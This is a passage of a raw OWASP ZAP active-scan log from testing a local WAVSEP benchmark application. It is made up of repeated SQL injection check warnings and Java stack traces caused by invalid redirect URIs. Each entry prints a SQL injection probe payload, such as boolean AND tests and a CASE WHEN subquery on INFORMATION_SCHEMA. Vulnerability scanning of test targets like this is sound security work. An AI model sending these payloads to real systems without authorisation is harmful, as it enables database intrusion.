org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680611 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 7771=3367 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7771=3367 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680611 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3102=3102 AND 'qEwI'='qEwI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3102=3102 AND 'qEwI'='qEwI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680613 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6523=6425 AND 'Jwmj'='Jwmj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6523=6425 AND 'Jwmj'='Jwmj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680613 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 4437=4437 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 4437=4437 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680614 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1532=6743 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1532=6743 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680615 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 7771=3367 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7771=3367 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680616 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8932=3954-- lxbZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8932=3954-- lxbZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680616 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8316=8316 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8316=8316 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680617 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3196=3196-- FiIB] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3196=3196-- FiIB at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680618 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1532=6743 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1532=6743 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680618 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8932=3954-- lxbZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8932=3954-- lxbZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680619 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3994=4433-- JLCl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3994=4433-- JLCl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680620 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3481=8645) THEN 3481 ELSE 3481*(SELECT 3481 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (3481=8645) THEN 3481 ELSE 3481*(SELECT 3481 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680620 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2393=2393-- zmUv] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2393=2393-- zmUv at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680621 [ZAP-ActiveScanner-1] WARN 